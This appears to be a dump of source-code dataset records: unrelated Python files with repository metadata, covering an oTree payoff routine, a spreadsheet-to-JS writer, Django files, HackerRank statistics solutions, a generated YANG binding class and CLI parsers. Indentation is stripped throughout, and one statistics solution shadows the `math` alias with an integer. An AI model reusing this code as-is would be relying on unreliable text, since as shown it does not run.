# set <choice_to_pay> to participant.var['choice_to_pay'] determined creating_session
# ------------------------------------------------------------------------------------------------------------
self.choice_to_pay = self.participant.vars['cem_choice_to_pay']
# determine whether the lottery (option "A") or the sure payoff (option "B") was chosen
# ------------------------------------------------------------------------------------------------------------
self.option_to_pay = getattr(self, self.choice_to_pay)
# set player's payoff
# ------------------------------------------------------------------------------------------------------------
indices = [list(t) for t in zip(*self.participant.vars['cem_choices'])][0]
index_to_pay = indices.index(self.participant.vars['cem_index_to_pay']) + 1
choice_to_pay = self.participant.vars['cem_choices'][index_to_pay - 1]
if self.option_to_pay == 'A':
if self.random_draw <= choice_to_pay[2]:
self.payoff = Constants.endowment + choice_to_pay[3]
else:
self.payoff = Constants.endowment + choice_to_pay[4]
else:
self.payoff = Constants.endowment + choice_to_pay[5]
# set payoff as global variable
# ------------------------------------------------------------------------------------------------------------
self.participant.vars['cem_payoff'] = self.payoff
# determine consistency
# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def set_consistency(self):
n = Constants.num_choices
# replace A's by 1's and B's by 0's
self.participant.vars['cem_choices_made'] = [
1 if j == 'A' else 0 for j in self.participant.vars['cem_choices_made']
]
# check for multiple switching behavior
for j in range(1, n):
choices = self.participant.vars['cem_choices_made']
self.inconsistent = 1 if choices[j] > choices[j - 1] else 0
if self.inconsistent == 1:
break
# determine switching row
# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def set_switching_row(self):
# set switching point to row number of first 'B' choice
if self.inconsistent == 0:
self.switching_row = sum(self.participant.vars['cem_choices_made']) + 1
|
[
"noreply@github.com"
] |
ahmedsalimnuhu.noreply@github.com
|
31c8a9268102ced0ab5dc34591ab3b96c09dec85
|
9b2150c5d7b71fd67bb4267e8fe93ac98658df77
|
/jsWriteFile.py
|
f791f3d4034c34c767c9f11c330e8c12db368239
|
[] |
no_license
|
rupkumar1996/STL-Code
|
10afb1e7835e64c56354dc6f47f1b1b282fe9647
|
22236443df305ef9c4868ed363b49b91376600fc
|
refs/heads/master
| 2021-02-09T15:52:26.290467
| 2020-03-02T06:58:28
| 2020-03-02T06:58:28
| 244,299,690
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,671
|
py
|
import xlrd
from string import Template
import os
import shutil
def jsWriter(folder_name):
if os.path.exists(folder_name +'/js'):
shutil.rmtree(folder_name +'/js')
shutil.copytree(os.getcwd() + '/js', folder_name+'/js')
with open(folder_name+'/js/externalFile.js', "a") as fp:
wb = xlrd.open_workbook(folder_name+'/scraped_data.xlsx')
sheet = wb.sheet_by_index(0)
nrows = sheet.nrows
# print(nrows)
for j in range(nrows-1):
fp.writelines("\n{")
fp.writelines(Template("id: \"$i\",\n").substitute(i=j+1))
fp.writelines(Template("image: \"images/$k.webp\",\n").substitute(k=j+1))
fp.writelines(Template("price: \"Rs. $price\",\n").substitute(price=int(float((str(sheet.cell_value(j+1,1)).strip()).replace(",", "")))))
fp.writelines(Template("name: \"$name\",\n").substitute(name=sheet.cell_value(j+1,0 )))
fp.writelines(Template("merchantName: \"$merchant\",\n").substitute(merchant=sheet.cell_value(j+1,5)))
fp.writelines(Template("viewproductUrl: \"$url\"\n").substitute(url=sheet.cell_value(j+1,3)))
fp.writelines("},")
fp.close()
with open(folder_name+'/js/externalFile.js', 'rb+') as f:
f.seek(0,2)
size=f.tell()
f.truncate(size-1)
f.close()
with open(folder_name+'/js/externalFile.js', "a") as fp:
fp.writelines('\n\n]')
fp.close()
rootdir = 'C:/Users/rupkumar.saha/Desktop/Ama_Files/'
for folders in os.listdir(rootdir):
if folders == '.DS_Store':
continue
print(folders)
jsWriter(rootdir + folders)
|
[
"ayushi.agarwal@walmartlabs.com"
] |
ayushi.agarwal@walmartlabs.com
|
f832bcd4c625f055315cb9acc7cff3c3d1d5f3f1
|
adffea7027bdd1c5733b3bd9361c2d32942cddbb
|
/blog/urls.py
|
e47c165886ad0490f944da1a9b8e6364db9b83a5
|
[] |
no_license
|
OnlyAdel/adel_portfolio
|
a1cd83f9195bb1f430fe4f2bc8ea65b7b0e49bd2
|
1ebfbf6ce3719bba303da5fab557e756b2d3a4e3
|
refs/heads/main
| 2023-05-05T12:50:47.819869
| 2021-05-19T13:45:04
| 2021-05-19T13:45:04
| 368,840,896
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 193
|
py
|
from django.urls import path
from . import views
app_name = 'blog'
urlpatterns = [
path('', views.all_blogs, name='all_blogs'),
path('<int:blog_id>/', views.detail, name='detail'),
]
|
[
"m.adel.kadi@pm.me"
] |
m.adel.kadi@pm.me
|
db704e6bc73086f4b513638afc26cfca69671862
|
4618c0152d45bcb5f54e298661a1479c643353f4
|
/pyengine/api/v1/GetProductDetail.py
|
d47126c2ec1ccde23882d215ccd30c526680ccaf
|
[] |
no_license
|
pyengine/catalog
|
07312fb7606f6ff0b7e55359740af4a4e5d509f4
|
2403563c1f93d988466a12b870ce25475b0d1d92
|
refs/heads/master
| 2021-01-10T04:47:24.200088
| 2016-04-13T15:04:47
| 2016-04-13T15:04:47
| 55,772,134
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 454
|
py
|
from pyengine.lib.error import *
from pyengine.lib.command import Command
class GetProductDetail(Command):
# Request Parameter Info
req_params = {
'uuid': ('r', 'str'),
}
def __init__(self, api_request):
super(self.__class__, self).__init__(api_request)
def execute(self):
mgr = self.locator.getManager('ProductManager')
info = mgr.getProductDetail(self.params)
return info.result()
|
[
"choonho.son@gmail.com"
] |
choonho.son@gmail.com
|
177f201e1b4fa621de91bd02b007ad83469d8818
|
1225f52c16125f0f5c0ef1766b5aa24d47c6e908
|
/crm/contacts/admin.py
|
25b45e4e6ae88539a3fc42f8f66739dde74bb131
|
[] |
no_license
|
Edvoy/cw_crm
|
4853eef48dd62645896c5f95603d9bd9e847b69a
|
c4449327a00b871f2275176c9ffe547dd60668ec
|
refs/heads/main
| 2023-05-02T06:34:01.245856
| 2021-05-27T11:52:35
| 2021-05-27T11:52:35
| 366,396,092
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
from django.contrib import admin
from .models import Contact
class ContactAdmin(admin.ModelAdmin):
fields = [
'contact_first_name',
'contact_last_name',
'contact_company',
'contact_job',
'contact_email',
'contact_phone',
'contact_notes',
]
admin.site.register(Contact, ContactAdmin)
|
[
"edouard.voyer@gmail.com"
] |
edouard.voyer@gmail.com
|
ab267947be157efba29c3961874240e4fe1525e0
|
fa60536fbc7c0d8a2a8f08f0a5b6351c77d08054
|
/3]. Competitive Programming/03]. HackerRank/1]. Practice/12]. 10 Days of Statistics/Day_6.py
|
e41bfd0b077838b4959c81b40f61a88e9381c66c
|
[
"MIT"
] |
permissive
|
poojitha2002/The-Complete-FAANG-Preparation
|
15cad1f9fb0371d15acc0fb541a79593e0605c4c
|
7910c846252d3f1a66f92af3b7d9fb9ad1f86999
|
refs/heads/master
| 2023-07-17T20:24:19.161348
| 2021-08-28T11:39:48
| 2021-08-28T11:39:48
| 400,784,346
| 5
| 2
|
MIT
| 2021-08-28T12:14:35
| 2021-08-28T12:14:34
| null |
UTF-8
|
Python
| false
| false
| 762
|
py
|
# 1st Solution------------------------------------------------
import math as m
x, n, m, s = int(input()),int(input()), int(input()),int(input())
m1 = n*m
s1 = m.sqrt(n)*s
def cdf(x, m, s):
z = (x-m)/s
return 0.5*(1 + m.erf(z/(m.sqrt(2))))
print(round(cdf(x, m1, s1), 4))
# 2nd Solution-------------------------------------------
import math
x, n = 250, 100
s_mean, s_stdev = 2.4, 2.0
stdev = s_stdev * math.sqrt(n)
cdf = 0.5*(1+math.erf((x-s_mean*n)/(stdev * math.sqrt(2))))
print(round(cdf, 4))
# 3rd Solution-----------------------------------------------
from math import sqrt
a, b, c, d, e = int(input()), int(input()), int(input()), float(input()), float(input())
print(round(b - (c/sqrt(a))*e, 2))
print(round(b + (c/sqrt(a))*e, 2))
|
[
"akashsingh27101998@gmai.com"
] |
akashsingh27101998@gmai.com
|
d7aab49e18b51fe7d949878d6cb8b8ceb6f8d356
|
9f6b4712faf640cb7cea29581db466fadd7d8323
|
/final/general.py
|
6c42ecac78ddc4cb6e499fa53973072b69f44b83
|
[] |
no_license
|
daniidega/proyecto_computacionGrafica
|
63d0975809de953643c03b030dbb72ca3ae2c86c
|
cf7fede2de3ff04c607ebffc0fbe89a9be71c0c9
|
refs/heads/master
| 2021-01-12T08:29:19.043186
| 2016-12-16T00:23:16
| 2016-12-16T00:23:16
| 76,595,709
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 114
|
py
|
import pygame
ANCHO=800
ALTO=500
BLANCO=(255,255,255)
NEGRO=(0,0,0)
ROJO=(255,0,0)
VERDE=(0,255,0)
AZUL=(0,0,255)
|
[
"danii.75@utp.edu.co"
] |
danii.75@utp.edu.co
|
fefbb2d228c834bce7c47910a3f7c291471595d6
|
1533bc7d9fad75236e9baffb1da9df3af66d2b06
|
/dactyl/cli.py
|
57d0c7c615f7ceb3192b2e32627f6730e9116a25
|
[
"MIT"
] |
permissive
|
MarcelRaschke/dactyl
|
e3533c04cc4493f91a3aa523cb745ab27781e2d4
|
c93a6e455ec904685b7992c52967401f5559d7d2
|
refs/heads/master
| 2023-04-07T10:51:22.547757
| 2019-10-18T04:51:57
| 2019-10-18T04:51:57
| 234,778,195
| 1
| 1
|
MIT
| 2023-04-03T23:39:18
| 2020-01-18T18:26:22
| null |
UTF-8
|
Python
| false
| false
| 6,481
|
py
|
#!/usr/bin/env python3
from dactyl.common import *
import argparse
class DactylCLIParser:
UTIL_BUILD = "Generate static site from markdown and templates."
UTIL_LINKS = "Check files in this repository for broken links."
UTIL_STYLE = "Check content files for style issues."
def __init__(self, utility):
"""Specify commandline usage and parse arguments"""
parser = argparse.ArgumentParser(description=utility)
noisiness = parser.add_mutually_exclusive_group(required=False)
noisiness.add_argument("--quiet", "-q", action="store_true",
help="Suppress status messages")
noisiness.add_argument("--debug", action="store_true",
help="Print debug-level log messages")
parser.add_argument("--config", "-c", type=str,
help="Specify path to an alternate config file.")
parser.add_argument("--version", "-v", action="store_true",
help="Print version information and exit.")
parser.add_argument("--bypass_errors", "-b", action="store_true",
help="Continue if recoverable errors occur")
if utility in (self.UTIL_BUILD, self.UTIL_STYLE):
parser.add_argument("--target", "-t", type=str,
help="Use the specified target (from the config file).")
if utility == self.UTIL_BUILD:
build_mode = parser.add_mutually_exclusive_group(required=False)
build_mode.add_argument("--pdf", nargs="?", type=str,
const=DEFAULT_PDF_FILE, default=NO_PDF,
help="Output a PDF to this file. Requires Prince.")
build_mode.add_argument("--md", action="store_true",
help="Output markdown only")
build_mode.add_argument("--html", action="store_true", default=True,
help="Output HTML files (the default)")
build_mode.add_argument("--es", action="store_true",
help="Output JSON for ElasticSearch upload")
# HTML is the default mode
static_files = parser.add_mutually_exclusive_group(required=False)
static_files.add_argument("--copy_static", "-s", action="store_true",
help="Copy all static files to the out dir",
default=False)
static_files.add_argument("--no_static", "-S", action="store_true",
help="Don't copy any static files to the out dir",
default=False)
static_files.add_argument("--template_static", "-T", action="store_true",
help="Copy only templates' static files to the out dir",
default=False)
static_files.add_argument("--content_static", "-C", action="store_true",
help="Copy only the content's static files to the out dir",
default=False)
parser.add_argument("--es_upload", nargs="?", type=str,
const=DEFAULT_ES_URL, default=NO_ES_UP,
help="Upload documents to ElasticSearch cluster "+
"at this URL (http://localhost:9200 by default). "+
"Ignored when making PDFs.")
parser.add_argument("--leave_temp_files", action="store_true",
help="Leave temp files in place (for debugging or "+
"manual PDF generation). Ignored when using --watch",
default=False)
parser.add_argument("--list_targets_only", "-l", action="store_true",
help="Don't build anything, just display list of "+
"known targets from the config file.")
parser.add_argument("--only", type=str, help=".md or .html filename of a "+
"single page in the config to build alone.")
parser.add_argument("--out_dir", "-o", type=str,
help="Output to this folder (overrides config file)")
parser.add_argument("--pages", type=str, help="Markdown file(s) to build "+\
"that aren't described in the config.", nargs="+")
parser.add_argument("--openapi", type=str, help="OpenAPI spec file "+
"to generate docs from.")
parser.add_argument("--no_cover", "-n", action="store_true",
help="Don't automatically add a cover / index file.")
parser.add_argument("--skip_preprocessor", action="store_true", default=False,
help="Don't pre-process Jinja syntax in markdown files")
parser.add_argument("--template_strict_undefined", action="store_true",
help="Raise an error on undefined variables in "+
"template syntax.")
parser.add_argument("--pp_strict_undefined", action="store_true",
help="Raise an error on undefined variables in "+
"preprocessor syntax.")
parser.add_argument("--title", type=str, help="Override target display "+\
"name. Useful when passing multiple args to --pages.")
parser.add_argument("--vars", type=str, help="A YAML or JSON file with vars "+
"to add to the target so the preprocessor and "+
"templates can reference them.")
parser.add_argument("--watch", "-w", action="store_true",
help="Watch for changes and re-generate output. "+\
"This runs until force-quit.")
elif utility == self.UTIL_LINKS:
parser.add_argument("-o", "--offline", action="store_true",
help="Check local anchors only")
parser.add_argument("-s", "--strict", action="store_true",
help="Exit with error even on known problems")
parser.add_argument("-n", "--no_final_retry", action="store_true",
help="Don't wait and retry failed remote links at the end.")
self.cli_args = parser.parse_args()
|
[
"mduo13@gmail.com"
] |
mduo13@gmail.com
|
1f8eb3d5d29c1b02e07895acc3f612ee67858941
|
51f887286aa3bd2c3dbe4c616ad306ce08976441
|
/pybind/slxos/v17s_1_02/routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/__init__.py
|
0eecc2d4add5bb3dd32255bc3b601767a6121cd0
|
[
"Apache-2.0"
] |
permissive
|
b2220333/pybind
|
a8c06460fd66a97a78c243bf144488eb88d7732a
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
refs/heads/master
| 2020-03-18T09:09:29.574226
| 2018-04-03T20:09:50
| 2018-04-03T20:09:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,516
|
py
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class ipv6_address(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-common-def - based on the path /routing-system/interface/loopback/ipv6/ipv6-config/address/ipv6-address. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__address','__eui64','__anycast',)
_yang_name = 'ipv6-address'
_rest_name = 'ipv6-address'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__eui64 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="eui64", rest_name="eui-64", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address with an automatically computed EUI-64 interface Id', u'alt-name': u'eui-64'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)
self.__anycast = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="anycast", rest_name="anycast", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address as anycast'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)
self.__address = YANGDynClass(base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),], is_leaf=True, yang_name="address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A:B::C:D/LEN;; IPv6 prefix format: xxxx:xxxx/ml, xxxx:xxxx::/ml, xxxx::xx/128'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='union', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'routing-system', u'interface', u'loopback', u'ipv6', u'ipv6-config', u'address', u'ipv6-address']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'interface', u'Loopback', u'ipv6', u'address', u'ipv6-address']
def _get_address(self):
"""
Getter method for address, mapped from YANG variable /routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/address (union)
"""
return self.__address
def _set_address(self, v, load=False):
"""
Setter method for address, mapped from YANG variable /routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/address (union)
If this variable is read-only (config: false) in the
source YANG file, then _set_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_address() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),], is_leaf=True, yang_name="address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A:B::C:D/LEN;; IPv6 prefix format: xxxx:xxxx/ml, xxxx:xxxx::/ml, xxxx::xx/128'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='union', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """address must be of a type compatible with union""",
'defined-type': "brocade-ipv6-config:union",
'generated-type': """YANGDynClass(base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),], is_leaf=True, yang_name="address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A:B::C:D/LEN;; IPv6 prefix format: xxxx:xxxx/ml, xxxx:xxxx::/ml, xxxx::xx/128'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='union', is_config=True)""",
})
self.__address = t
if hasattr(self, '_set'):
self._set()
def _unset_address(self):
self.__address = YANGDynClass(base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),], is_leaf=True, yang_name="address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A:B::C:D/LEN;; IPv6 prefix format: xxxx:xxxx/ml, xxxx:xxxx::/ml, xxxx::xx/128'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='union', is_config=True)
def _get_eui64(self):
"""
Getter method for eui64, mapped from YANG variable /routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/eui64 (empty)
"""
return self.__eui64
def _set_eui64(self, v, load=False):
"""
Setter method for eui64, mapped from YANG variable /routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/eui64 (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_eui64 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_eui64() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="eui64", rest_name="eui-64", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address with an automatically computed EUI-64 interface Id', u'alt-name': u'eui-64'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """eui64 must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="eui64", rest_name="eui-64", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address with an automatically computed EUI-64 interface Id', u'alt-name': u'eui-64'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)""",
})
self.__eui64 = t
if hasattr(self, '_set'):
self._set()
def _unset_eui64(self):
self.__eui64 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="eui64", rest_name="eui-64", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address with an automatically computed EUI-64 interface Id', u'alt-name': u'eui-64'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)
def _get_anycast(self):
"""
Getter method for anycast, mapped from YANG variable /routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/anycast (empty)
"""
return self.__anycast
def _set_anycast(self, v, load=False):
"""
Setter method for anycast, mapped from YANG variable /routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/anycast (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_anycast is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_anycast() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="anycast", rest_name="anycast", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address as anycast'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """anycast must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="anycast", rest_name="anycast", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address as anycast'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)""",
})
self.__anycast = t
if hasattr(self, '_set'):
self._set()
def _unset_anycast(self):
self.__anycast = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="anycast", rest_name="anycast", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address as anycast'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)
address = __builtin__.property(_get_address, _set_address)
eui64 = __builtin__.property(_get_eui64, _set_eui64)
anycast = __builtin__.property(_get_anycast, _set_anycast)
_pyangbind_elements = {'address': address, 'eui64': eui64, 'anycast': anycast, }
|
[
"badaniya@brocade.com"
] |
badaniya@brocade.com
|
fbc9661d70e561d78342cfa587b4a738aa00e9e6
|
c85ec43e50f81f8e20c883eae9e06a5c8c621f8e
|
/caldera/utils/__init__.py
|
b2967128d628a732cece629c50a123db23a166f8
|
[
"MIT"
] |
permissive
|
jvrana/caldera
|
b6cc0faed560df6bfa15a3f460fed4ea18b8a55a
|
a346324e77f20739e00a82f97530dda4906f59dd
|
refs/heads/master
| 2023-04-27T04:19:05.499430
| 2021-03-09T16:37:50
| 2021-03-09T16:37:50
| 266,161,720
| 0
| 0
|
MIT
| 2020-08-12T01:40:48
| 2020-05-22T16:49:35
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,795
|
py
|
r"""
Caldera utility functions.
.. autosummary::
:toctree: generated/
dict_join
# pairwise
Indexing
--------
.. autosummary::
:toctree: generated/
reindex_tensor
unravel_index
Tensor
------
Utilities for :class:`torch.Tensor`
.. autosummary::
:toctree: generated/
scatter_coo
scatter_indices
torch_coo_to_scipy_coo
deterministic_seed
long_isin
same_storage
stable_arg_sort_long
tensor_is_empty
torch_scatter_group
Functional
----------
Functional programming module.
.. autosummary::
:toctree: generated/
:recursive:
functional
Networkx Utilities
------------------
Extra :mod:`networkx` utilities
.. autosummary::
:toctree: generated/
:recursive:
"""
from ._dict_join import dict_join
from ._iteration import _first
from ._iteration import pairwise
from caldera.utils.indexing import reindex_tensor
from caldera.utils.indexing import unravel_index
from caldera.utils.np import replace_nan_with_inf
from caldera.utils.sparse import scatter_coo
from caldera.utils.sparse import scatter_indices
from caldera.utils.sparse import torch_coo_to_scipy_coo
from caldera.utils.tensor import deterministic_seed
from caldera.utils.tensor import long_isin
from caldera.utils.tensor import same_storage
from caldera.utils.tensor import stable_arg_sort_long
from caldera.utils.tensor import tensor_is_empty
from caldera.utils.tensor import torch_scatter_group
__all__ = [
"reindex_tensor",
"unravel_index",
"scatter_coo",
"scatter_indices",
"torch_coo_to_scipy_coo",
"deterministic_seed",
"long_isin",
"same_storage",
"stable_arg_sort_long",
"tensor_is_empty",
"torch_scatter_group",
"dict_join",
"pairwise",
"_first",
"replace_nan_with_inf",
]
|
[
"justin.vrana@gmail.com"
] |
justin.vrana@gmail.com
|
